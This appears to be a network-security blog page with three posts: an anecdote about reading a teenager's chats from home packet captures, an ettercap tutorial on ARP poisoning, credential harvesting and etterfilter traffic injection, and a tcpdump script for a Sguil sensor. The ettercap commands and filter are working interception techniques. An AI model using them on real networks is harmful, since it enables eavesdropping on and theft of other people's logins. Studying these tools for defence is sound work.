
04 June, 2012

A Practical Example of Non-technical Indicators and Incident Response

Once upon a time there was a network security analyst slash NSM engineer who, like any sane person, ran full packet capture, IDS/IPS, session capture, and passive fingerprinting inline at the ingress/egress of his home network. His setup was most similar to diagram two in IDS/IPS Placement on Home Network.

This security analyst was casually going about his business one day when he opened the basement door of his house and found a tennis ball wedged between the door frame and the storm door. “That’s odd!” he thought. “Who would do that?”

After removing the tennis ball, he thought, “Well, this storm door is really loud when it closes those last few inches. Maybe someone did it to quietly enter or exit the house.” It just so happens that the daughter of said analyst was in high school and her bedroom was down the hall from the basement door. He promptly entered her room and took a quick look around. Lo and behold, the screen from her window was under her bed and the window itself was unlocked. Since this room was on the ground floor, the analyst immediately had some good ideas about what was happening with the window and the basement door. Someone was sneaking in or out of the house!

The analyst confronted his teenage daughter when she got home from school and received denial after denial about any possible wrongdoing. The denials did not sound sincere.

Enter network security monitoring. He stated, “I told you I would respect your privacy with your email and other electronic communications unless you gave me a reason not to. I consider you in violation of these Terms of Service and I’m going to see what you’ve been up to lately.”

At this point it was late in the evening and the analyst had to get up early for work. This was some years back when AIM was quite common, so he briefly used Sguil to look at recent sessions of AOL Instant Messenger traffic. He decided to get some sleep for work the next day and put off additional investigation. In the meantime, his daughter's privileges were highly restricted.

A day or two later, after trying to manually sift through some of the ASCII transcripts of the packet captures, the analyst quickly decided there was a better way. He whipped up a short shell script to loop through all the packet captures, run Dug Song’s msgsnarf, and pipe the output into an HTML file for later examination. It took a little tweaking to make the HTML easily readable, but the script was quick to write and test.
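
A minimal sketch of that approach is below. The /nsm path, file naming, and output location are assumptions for illustration (matching the Sguil sensor layout described in a later post on this page), and it relies on msgsnarf from Dug Song's dsniff suite being able to read saved captures with "-p".

#!/bin/sh
# Sketch: extract IM conversations from every saved pcap into one HTML page.
outfile=/tmp/aim_chats.html

echo "<html><body><pre>" > "$outfile"
for pcap in /nsm/sensor/dailylogs/*/snort.log.*; do
    # msgsnarf -p reads a saved capture instead of sniffing live
    msgsnarf -p "$pcap" >> "$outfile"
done
echo "</pre></body></html>" >> "$outfile"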

The next morning there were many hundreds of lines of AIM conversations to examine. He started with the most recent and read backwards. Within a few minutes he confirmed that his daughter had been sneaking out of the house to go to parties and get into other mischief.

Another conversation with his daughter finally led to her confession, a long discussion, and suitable punishment. Despite the severity of her actions, the HTML file containing the chat transcripts also contained a few endearing nuggets.

Daughter: OMG they know everything!
Accomplice: what do u mean everything
Daughter: my dad can read all my chats
Daughter: he does computer security for [company redacted]
Daughter: he’s a computer genius
Daughter: DAD I’M INNOCENT!

When the analyst later told this story to a colleague, the colleague remarked that the last few lines were the best Father’s Day gift the analyst would ever receive.

I think there are a few obvious lessons here that can translate to network monitoring.

First, the initial indicator of the problem was in the physical world. Network security monitoring, or any other kind of technical monitoring and prevention, will sometimes fail. I have seen many cases where phone calls from users were among the earliest indicators of malicious activity. Particularly in the case of insider threats, many initial indicators are non-technical: a person's behavior, a personnel action, or, as in this case, a physical sign of a security problem.

Second, sometimes you need to be flexible to solve a problem quickly and with minimal effort. The analyst could have manually sifted through the AIM traffic, but because he judged that the threat of another incident was already mitigated by talking to his daughter, digging up the traffic wasn’t urgent. Instead, the analyst wrote a script to pull all the traffic and convert it to a readable format. He also had the luxury of knowing that all the packet captures would still be there, since his home bandwidth at the time meant well over 30 days of pcap storage.

Third, network monitoring is a means to an end. In this case, there was a security problem that could be addressed with the help of technical means. In many obvious cases you are trying to protect data. In other cases, you may be trying to protect people or things in the physical world that could be harmed if the wrong information is revealed. It is important to stay focused on what really matters and not get caught up worrying about the wrong things because your instrumentation or technologies push you toward priorities that don’t make sense.

Last, attackers are not static. The daughter certainly learned the value of encryption, and even of out-of-band communication such as SMS over the phone network, if she did not want the network sensor recording her conversations in plain text. Advancing technology also makes attackers evolve, for instance the move from older forms of IM to Facebook chat or SMS.

28 February, 2011

Using ettercap for ARP poisoning

Ettercap is certainly nothing new, and there is plenty of documentation on how to use it, but I was sitting here goofing around and decided to record my results. I am not advocating this sort of thing on a public network; ARP poisoning and other attacks often fall afoul of the terms of service of public and private networks, and may even be illegal in some jurisdictions.

First, I looked at my default route.

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.71.0.0       0.0.0.0         255.255.255.0   U     2      0        0 wlan0
0.0.0.0         10.71.0.1       0.0.0.0         UG    0      0        0 wlan0


To sniff the whole subnet, I'll want to do some ARP poisoning to send all traffic to and from the default gateway through my system.

$ sudo ettercap -i wlan0 -T -M arp:remote /10.71.0.1/ //

You can also use "// //" to have ettercap poison every source and destination it sees. The "-T" tells ettercap to use the text interface, which is still interactive. There is also a curses-based interface, "-C", and a GTK interface, "-G", though the GTK one has always seemed less reliable to me than the others. The curses interface is actually pretty nice.
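
For example, the fully promiscuous form of the command above, poisoning traffic between any hosts ettercap sees, would be:

$ sudo ettercap -i wlan0 -T -M arp:remote // //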

Once you run the command, ettercap should enumerate hosts and you will start seeing traffic information scrolling through your console. How do we know if it's actually working? If you see non-broadcast traffic destined for other hosts, it will be obvious that you're successfully sniffing all the traffic.
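
One quick sanity check, for example, is to watch for unicast traffic that is neither to nor from your own host; the address below is just an illustration standing in for your own IP:

$ sudo tcpdump -n -i wlan0 ip and not host 10.71.0.50 and not broadcast and not multicast

If packets between, say, another laptop and the gateway scroll by, the poisoning is working.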

Another fun way is to open etherape for a realtime visualization of the traffic. If you are seeing typical non-broadcast traffic like HTTP and HTTPS, that's an indicator that you're successfully ARP poisoning. You can also quickly see whether particular hosts are generating a lot of traffic. I've seen the typical sites like Facebook, Amazon, Akamai, and LLNW, but also more interesting sites that are easily identifiable as VPN concentrators, banks, and more.

You can also, of course, use various tools, including ettercap with the "-w" option, to write traffic to a file and review it at your leisure to look for interesting data. Ettercap also has an interesting logging option and companion utility for automatically grabbing usernames and passwords. From the man page:

       -L, --log
              Log  all  the packets to binary files. These files can be parsed
              by etterlog(8) to extract human readable data. With this option,
              all  packets  sniffed  by ettercap will be logged, together with
              all the passive info (host info + user & pass) it  can  collect.
              Given  a LOGFILE, ettercap will create LOGFILE.ecp (for packets)
              and LOGFILE.eci (for the infos).
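
So a live run that both writes the raw packets with "-w" and logs the parsed info with "-L" might look like the following; this is just a sketch combining the options above, and the file names are arbitrary:

$ sudo ettercap -i wlan0 -T -M arp:remote -w hotel.raw -L hotel /10.71.0.1/ //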


If you didn't enable logging during the original ettercap run, you can also run it against a saved packet capture.

$ ettercap -r hotel.raw -L hotel

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Please select an User Interface

$ ls hotel*
hotel.eci  hotel.ecp  hotel.raw

$ etterlog -a hotel.eci

etterlog NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Log file version    : NG-0.7.3
Timestamp           : Wed Feb 16 14:20:57 2010
Type                : LOG_INFO

Number of hosts (total)       : 248

Number of local hosts         : 30
Number of non local hosts     : 0
Number of gateway             : 0

Number of discovered services : 240
Number of accounts captured   : 4

$ etterlog -p hotel.eci

74.125.93.191   TCP 80     USER: fakeuser      PASS: fakepasswd

I changed the data above, and of course most sites these days are hopefully forcing encrypted logins.

These days, many sites can be hosted on a single IP address or virtual server. If you didn't catch the DNS or HTTP request immediately before the captured login, the easiest way to determine which site on a given IP was being visited is to open the packet capture with a tool like Wireshark, filter on the IP, and look at the web traffic itself for the site's name. Looking in Wireshark, I can see the GET immediately after the TCP handshake.

GET /members/bbs/showthread.php HTTP/1.1
Host: www.fakedomain.com
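
The same lookup can be scripted with tshark; the sketch below reuses the IP address and capture file from the example above. Depending on your tshark version the display filter flag is "-Y" or "-R".

$ tshark -r hotel.raw -Y "ip.addr == 74.125.93.191 && http.request" -T fields -e http.host -e http.request.uri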

This really just scratches the surface of what you can do with ettercap and other network tools. ARP poisoning still works, particularly on public networks, and many people log in to services whose credentials can easily be captured through sniffing (I write this while sitting in an airport on public WiFi, logged into my Blogger account). A relatively recent high profile example was when the Metasploit site was briefly hijacked through successful ARP poisoning.

There are numerous other attacks besides sniffing that can succeed while ARP poisoning, many involving redirecting traffic or injecting malicious content. For instance, you can use something like sslstrip to downgrade HTTPS connections to plain HTTP, grabbing credentials in the process. You could also inject content directly using etterfilter.

 DESCRIPTION
       The etterfilter utility is used to compile  source  filter  files  into
       binary  filter  files that can be interpreted by the JIT interpreter in
       the ettercap(8) filter engine. You have to compile your filter  scripts
       in  order  to  use  them  in  ettercap. All syntax/parse errors will be
       checked at compile time, so you will  be  sure  to  produce  a  correct
       binary filter for ettercap.

Using etterfilter you can inject new packets, replace data in packets, and more. If someone is visiting what they consider a known safe site, replacing data or injecting malicious packets can be quite successful. At a previous job, we had a non-production network for attack and defend fun, and with etterfilter I was able to replace all the image requests made by one of my colleagues' browsers and have them fetch an image of my choosing instead.
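
As a rough sketch of what such a filter looks like (the URL is a placeholder, not the exact filter I used), something along these lines rewrites image tags in HTTP responses:

# image-swap.filter
# compile: etterfilter image-swap.filter -o image-swap.ef
# load:    ettercap -i wlan0 -T -M arp:remote -F image-swap.ef /10.71.0.1/ //
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      # same-length replacement keeps the server from compressing responses
      replace("Accept-Encoding", "Accept-Nothing!");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.fakedomain.com/funny.jpg\" ");
   msg("Image tag rewritten.\n");
}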

Although my example above is obviously on a wireless network as shown by using the wlan0 interface, you can easily perform ARP poisoning on a local wired segment. There are also a number of ways to help detect or prevent poisoning with your network appliances or software.

Finally, ettercap also has a number of interesting plugins available.

$ ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA


Available plugins :

         arp_cop  1.1  Report suspicious ARP activity
         autoadd  1.2  Automatically add new victims in the target range
      chk_poison  1.1  Check if the poisoning had success
       dns_spoof  1.1  Sends spoofed dns replies
      dos_attack  1.0  Run a d.o.s. attack against an IP address
           dummy  3.0  A plugin template (for developers)
       find_conn  1.0  Search connections on a switched LAN
   find_ettercap  2.0  Try to find ettercap activity
         find_ip  1.0  Search an unused IP address in the subnet
          finger  1.6  Fingerprint a remote host
   finger_submit  1.0  Submit a fingerprint to ettercap's website
       gre_relay  1.0  Tunnel broker for redirected GRE tunnels
     gw_discover  1.0  Try to find the LAN gateway
         isolate  1.0  Isolate an host from the lan
       link_type  1.0  Check the link type (hub/switch)
    pptp_chapms1  1.0  PPTP: Forces chapms-v1 from chapms-v2
      pptp_clear  1.0  PPTP: Tries to force cleartext tunnel
        pptp_pap  1.0  PPTP: Forces PAP authentication
      pptp_reneg  1.0  PPTP: Forces tunnel re-negotiation
      rand_flood  1.0  Flood the LAN with random MAC addresses
  remote_browser  1.2  Sends visited URLs to the browser
       reply_arp  1.0  Simple arp responder
    repoison_arp  1.0  Repoison after broadcast ARP
   scan_poisoner  1.0  Actively search other poisoners
  search_promisc  1.2  Search promisc NICs in the LAN
       smb_clear  1.0  Tries to force SMB cleartext auth
        smb_down  1.0  Tries to force SMB to not use NTLM2 key auth
     stp_mangler  1.0  Become root of a switches spanning tree
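
For example, the chk_poison plugin can be loaded at startup to verify that the poisoning actually took; you can also activate plugins from the interactive text interface by pressing "p".

$ sudo ettercap -i wlan0 -T -M arp:remote -P chk_poison /10.71.0.1/ //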

30 November, 2007

A "for" loop with tcpdump

This is the kind of post to which most people with Linux or Unix experience will say "Duh!", or even offer better ways to do what I'm doing. It's just a short shell script I use to loop through all the packet capture files on a Sguil sensor looking for specific host(s) and/or port(s). Sometimes it is easier to run a script like this and then SCP the files from the sensor to a local system instead of querying and opening the packet captures one by one using the Sguil client. This also allows more leisurely analysis without worrying about the log_packets script deleting any of the data I want to see.

Nigel Houghton mentioned that any shell script of more than 10 or 20 lines should be rewritten in Perl. In keeping with his advice, I do plan to switch some of my shell scripts to Perl when I get the chance. ;)

The sensorname variable works for me because my sensor uses the hostname as the sensor name. If my sensor name didn't match the actual hostname or I had multiple sensors on one host then I would have to change the variable.

The BPF expression can be changed as needed. Maybe a better way would be to set it to a command line argument so you don't have to edit the file every time you run the script. The following example uses a Google IP address and port 80 for the BPF. I most often use this script to simply grab all traffic associated with one or more IP addresses.

It may also be worth noting that I run the script as a user that has permissions to the packet captures.

#!/bin/sh

# Pull all traffic matching the BPF expression out of every daily pcap
# on a Sguil sensor and write the matches to $outdir.
sensorname="`hostname`"
bpfexpression="host 64.233.167.99 and port 80"
outdir=/home/nr/scriptdump

if [ ! -d "$outdir" ]; then
    mkdir "$outdir"
fi

# For each dir in the dailylogs dir
for i in $( ls /nsm/$sensorname/dailylogs/ ); do
    # For each file in the dailylogs/$i dir
    for j in $( ls /nsm/$sensorname/dailylogs/$i ); do
        # Run tcpdump against the capture, keeping only matching packets
        tcpdump -r /nsm/$sensorname/dailylogs/$i/$j -w $outdir/$j.pcap $bpfexpression
    done
done

# For each resulting pcap
cd $outdir
for file in $( ls *.pcap ); do
    # A 24-byte file is just the pcap header with no packets, so remove it
    if [ "`ls -l $file | awk '{print $5}'`" = "24" ]; then
        rm -f "$file"
    fi
done

One of the things I like about posting even a simple script like this is that it makes me really think about how it could be improved. For instance, it might be nice to add a variable for the write directory so it is easier to change where the output files go.
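
Along those lines, a small variation could take both the BPF expression and the output directory from the command line. This is just a sketch and not tested against the original sensor layout:

#!/bin/sh
# Sketch: same idea, but the BPF expression and output directory are
# command line arguments, e.g.:
#   ./pcapfilter.sh "host 64.233.167.99 and port 80" /home/nr/scriptdump
sensorname="`hostname`"
bpfexpression="$1"
outdir="${2:-/home/nr/scriptdump}"

[ -d "$outdir" ] || mkdir "$outdir"

for pcap in /nsm/$sensorname/dailylogs/*/*; do
    out="$outdir/`basename $pcap`.pcap"
    tcpdump -r "$pcap" -w "$out" $bpfexpression
    # remove output files that contain only the 24-byte pcap header
    [ "`ls -l $out | awk '{print $5}'`" = "24" ] && rm -f "$out"
done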

Also, in Sguil the full content packet captures use the Unix time in the file names. If you ever had a copy of the file where the timestamp wasn't preserved, you could still find it by looking at the epoch time in the file name. For instance, with a file named "snort.log.1194141602", the following would convert the epoch time to local time:
$ date -d @1194141602
Sat Nov 3 22:00:02 EDT 2007
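
The reverse conversion is handy too, for instance to figure out which capture file should contain traffic from a particular local time (the output assumes the same EDT timezone as above):

$ date -d "2007-11-03 22:00:02" +%s
1194141602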